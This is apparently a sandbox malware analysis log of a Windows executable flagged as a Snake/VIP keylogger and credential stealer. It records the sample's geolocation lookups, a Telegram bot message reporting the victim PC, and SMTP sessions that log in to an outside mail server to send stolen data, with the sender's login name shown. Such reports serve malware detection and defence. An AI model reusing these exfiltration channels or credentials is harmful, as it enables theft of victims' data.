2024-12-18 16:07:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49753	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:28 UTC	880	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526816 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lqlGVU2YjyLhIRyFv1I%2BIZSXsaAdepNLfJkliCap%2B%2FVGZxeHi36fIdViLNvUcswXFB5VWDt6phQ1L%2BwAlGSbOGUHTM8qezSyHuABHjoc8SKJrQnt6GNTSm97m06lzzAgRs6c33X%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4067ef3b80199d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1855&min_rtt=1847&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1526398&cwnd=223&unsent_bytes=0&cid=aab674d45e982050&ts=473&x=0"
2024-12-18 16:07:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49764	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:31 UTC	877	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526819 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HUKagKwuZkmDpkZ3jMxbzVFT19gBOhKUniC1qSglfoaSt08RytDPbSz1EgA1HTgwivwEfEL4kdnhiVDvq7xyYsD%2FPbi8OrKcFspxsKPucDJE5%2BCXDuEzFrUxO%2BvTd5BN99sTFtkg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4068023ac87ce7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4059&min_rtt=1867&rtt_var=2196&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1564006&cwnd=193&unsent_bytes=0&cid=6baf53c4ea861ca1&ts=475&x=0"
2024-12-18 16:07:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49772	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:34 UTC	880	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526822 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88QX9BFuIqpbpEH0rmXSPLrdyWonk35knEsOiSe3FUMU8Oo7%2Bd%2FdY6ore61G2fL5Ne2LD2YhbBtTP%2FmUNsA9XIvv2h4qeBCMpOmgQsy1Io%2FQd%2FNZlpNUrrFh8phOtBlsk4K5mGmY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4068151a1bc324-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1491&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=162&unsent_bytes=0&cid=ab6f82b3df7fd978&ts=456&x=0"
2024-12-18 16:07:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49783	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:36 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:37 UTC	884	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526826 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dbcJPAzF9Sgt7JONS1j7IXyVBk6cFBA6LN%2F4%2FvZUku7RYO2LgL3vxiwQ1E4Q%2F22fCXETVFDyyX3lggY6HY7NtfvoBc36xB7CKIU%2FiJ88%2BohIIDV3OJNA1oi%2BIbMMPN74XC%2FInmP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f406828986e43a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1604&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1689814&cwnd=223&unsent_bytes=0&cid=41ab02066affe1b2&ts=461&x=0"
2024-12-18 16:07:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49792	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:40 UTC	882	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526829 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1KrkOHxe5ZZpbHG31mA0U9v9QToW%2B6YlcXtBxC8%2BirEuoqJUDo1nKY87340noPvkCDmOo7d9E%2B2bci4W2nbWCvVaiTEhWLcUvPO2xYK5jVo8%2FHI276%2B6yyECIOCxMY%2FnsiKCEzu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40683b691c4346-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1579&rtt_var=643&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1638608&cwnd=252&unsent_bytes=0&cid=ae9fad53d326a91b&ts=456&x=0"
2024-12-18 16:07:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49798	104.21.67.152	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:42 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 16:07:43 UTC	878	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 16:07:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 526832 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBzRvkLhICNx%2F032gtnCROrSEVXOIrEk2uQiwjjZmgZf%2FBmzwNBs0ylFbWPnYSeo5sbBFkWs6a4qwHN%2Bh2Bgu9jO6oH%2FqQ9Lbd9Mi3BkmK63mA8y3toSP7KWDlWZ5nuQDImpKbGd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f40684e2b794252-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1589&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1798029&cwnd=235&unsent_bytes=0&cid=058da556460071d1&ts=467&x=0"
2024-12-18 16:07:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49803	149.154.167.220	443	7100	C:\Users\user\Desktop\_Company.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 16:07:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-18 16:07:45 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 16:07:45 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 16:07:45 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 18, 2024 17:07:52.417762995 CET	587	49824	172.65.255.143	192.168.2.6	220 ESMTP smtp.hostinger.com
Dec 18, 2024 17:07:52.418638945 CET	49824	587	192.168.2.6	172.65.255.143	EHLO 377142
Dec 18, 2024 17:07:52.809969902 CET	587	49824	172.65.255.143	192.168.2.6	250-smtp.hostinger.com 250-PIPELINING 250-SIZE 48811212 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Dec 18, 2024 17:07:52.811453104 CET	49824	587	192.168.2.6	172.65.255.143	AUTH login b3V0QHBsaHQzNjUuY29t
Dec 18, 2024 17:07:53.203979969 CET	587	49824	172.65.255.143	192.168.2.6	334 UGFzc3dvcmQ6
Dec 18, 2024 17:07:53.657196045 CET	587	49824	172.65.255.143	192.168.2.6	235 2.7.0 Authentication successful
Dec 18, 2024 17:07:53.657460928 CET	49824	587	192.168.2.6	172.65.255.143	MAIL FROM:<out@plht365.com>
Dec 18, 2024 17:07:54.056657076 CET	587	49824	172.65.255.143	192.168.2.6	250 2.1.0 Ok
Dec 18, 2024 17:07:54.056911945 CET	49824	587	192.168.2.6	172.65.255.143	RCPT TO:<inside@plht365.com>
Dec 18, 2024 17:07:54.470879078 CET	587	49824	172.65.255.143	192.168.2.6	250 2.1.5 Ok
Dec 18, 2024 17:07:54.471097946 CET	49824	587	192.168.2.6	172.65.255.143	DATA
Dec 18, 2024 17:07:54.864589930 CET	587	49824	172.65.255.143	192.168.2.6	354 End data with <CR><LF>.<CR><LF>
Dec 18, 2024 17:07:54.865567923 CET	49824	587	192.168.2.6	172.65.255.143	.
Dec 18, 2024 17:07:55.443845987 CET	587	49824	172.65.255.143	192.168.2.6	250 2.0.0 Ok: queued as 4YCz9Q1yYsz6nv74
Dec 18, 2024 17:07:56.951675892 CET	49824	587	192.168.2.6	172.65.255.143	QUIT
Dec 18, 2024 17:07:57.344615936 CET	587	49824	172.65.255.143	192.168.2.6	221 2.0.0 Bye
Dec 18, 2024 17:07:58.676038980 CET	587	49838	172.65.255.143	192.168.2.6	220 ESMTP smtp.hostinger.com
Dec 18, 2024 17:07:58.676296949 CET	49838	587	192.168.2.6	172.65.255.143	EHLO 377142
Dec 18, 2024 17:07:59.073887110 CET	587	49838	172.65.255.143	192.168.2.6	250-smtp.hostinger.com 250-PIPELINING 250-SIZE 48811212 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Dec 18, 2024 17:07:59.074214935 CET	49838	587	192.168.2.6	172.65.255.143	AUTH login b3V0QHBsaHQzNjUuY29t
Dec 18, 2024 17:07:59.466568947 CET	587	49838	172.65.255.143	192.168.2.6	334 UGFzc3dvcmQ6
Dec 18, 2024 17:07:59.888154030 CET	587	49838	172.65.255.143	192.168.2.6	235 2.7.0 Authentication successful
Dec 18, 2024 17:07:59.896745920 CET	49838	587	192.168.2.6	172.65.255.143	MAIL FROM:<out@plht365.com>
Dec 18, 2024 17:08:00.293081999 CET	587	49838	172.65.255.143	192.168.2.6	250 2.1.0 Ok
Dec 18, 2024 17:08:00.293371916 CET	49838	587	192.168.2.6	172.65.255.143	RCPT TO:<inside@plht365.com>
Dec 18, 2024 17:08:00.713082075 CET	587	49838	172.65.255.143	192.168.2.6	250 2.1.5 Ok
Dec 18, 2024 17:08:00.713325024 CET	49838	587	192.168.2.6	172.65.255.143	DATA
Dec 18, 2024 17:08:01.122169018 CET	587	49838	172.65.255.143	192.168.2.6	354 End data with <CR><LF>.<CR><LF>
Dec 18, 2024 17:08:01.122653008 CET	49838	587	192.168.2.6	172.65.255.143	.
Dec 18, 2024 17:08:01.729691982 CET	587	49838	172.65.255.143	192.168.2.6	250 2.0.0 Ok: queued as 4YCz9X3gv4zFwV3Z
Dec 18, 2024 17:08:21.750197887 CET	587	49838	172.65.255.143	192.168.2.6	421 4.4.2 smtp.hostinger.com Error: timeout exceeded
Dec 18, 2024 17:09:30.754642963 CET	49838	587	192.168.2.6	172.65.255.143	QUIT

Target ID:	1
Start time:	11:07:12
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\_Company.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\_Company.exe"
Imagebase:	0xa50000
File size:	486'400 bytes
MD5 hash:	AFF56992589DFB76554EA1416C3E99D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:07:13
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\_Company.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\_Company.exe"
Imagebase:	0xaf0000
File size:	486'400 bytes
MD5 hash:	AFF56992589DFB76554EA1416C3E99D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.9%
Total number of Nodes:	243
Total number of Limit Nodes:	14

Executed Functions

Function 06179680 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4652399786.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6170000__Company.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 6ec79c9a65e009155a3bb37e4e3240a8f321d261d4c5ef49cfee271500aee440
Instruction ID: a1de849486eb3fcdc60cb01f70d098dfaa767f0197f0a48c6b924988af0cb072
Opcode Fuzzy Hash: 6ec79c9a65e009155a3bb37e4e3240a8f321d261d4c5ef49cfee271500aee440
Instruction Fuzzy Hash: 9FF11730E00209CFEB54DFA9C944B9DBBF1BF88314F158969E415AF2A5DB74A949CB80

Function 0535BF70 Relevance: 1.9, Strings: 1, Instructions: 615
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 0535C720

Memory Dump Source

Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5350000__Company.jbxd

Similarity

API ID: CreateProcess
String ID: (
API String ID: 963392458-3887548279
Opcode ID: e1af4c3ad2744d26ed53832762a320ac881263ee394701cb7709d9c1dc2f3651
